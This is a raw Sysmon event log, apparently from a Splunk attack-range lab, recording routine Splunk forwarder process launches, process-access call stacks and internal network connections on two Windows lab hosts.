10:47:47.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216107Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:47.389{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-10D3-6216-4404-000000003902}1588C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216106Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:47.389{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-10D3-6216-4404-000000003902}1588C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216105Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:47.390{4F8D34B0-10D3-6216-4404-000000003902}1588C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000216104Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.360{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51305-false10.0.1.12-8089- 23542300x8000000000000000287189Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:48.781{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE123D50EBAF24525EC5DBE4CE83553C,SHA256=C4143FD3608364543D56BC39F95CB84AC9E344939C7A0E31C41EAAAA0334FD91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216135Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:48.654{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=065E1B655CFAE3B25815996F209A7A50,SHA256=0FEC0CBA12C29EE606A1E6BEF9B2D2E14786A65006A05A9B1A125475F4C104DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216134Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:48.607{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C90B86C05E9F62D77CF48BFE4DD96DAA,SHA256=D40529698B6F6119C8376100B1413C153EEAD0E195222BB7893F197A24A78185,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216133Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.704{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51306-false10.0.1.12-8000- 10341000x8000000000000000216132Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:48.279{4F8D34B0-10D4-6216-4504-000000003902}23642884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216131Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:48.061{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-10D4-6216-4504-000000003902}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216130Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:48.061{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216129Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:48.061{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216128Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:48.061{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216127Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:48.061{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216126Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:48.061{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216125Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:48.061{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216124Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:48.061{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216123Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:48.061{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216122Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:48.061{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-10D4-6216-4504-000000003902}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216121Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:48.061{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216120Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:48.061{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-10D4-6216-4504-000000003902}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216119Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:48.062{4F8D34B0-10D4-6216-4504-000000003902}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287191Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:49.797{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BDBC1459AA0D03FE17EB3F797611BAA,SHA256=1138965A3203E09D23FF4AA9688C6F3687D4A172E48256C0C38C0D662E897A65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216150Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:49.795{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=374A237475C2558AEDB7BB0B1F2D6304,SHA256=C7BDE6C489E2DD6242735F2A4BBD77F385D78035FCBF6EF643B5C2293617A5DF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287190Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:47.598{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53395-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000216149Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:49.498{4F8D34B0-10D5-6216-4604-000000003902}12961144C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216148Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:49.357{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-10D5-6216-4604-000000003902}1296C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216147Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:49.357{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216146Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:49.357{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216145Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:49.357{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216144Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 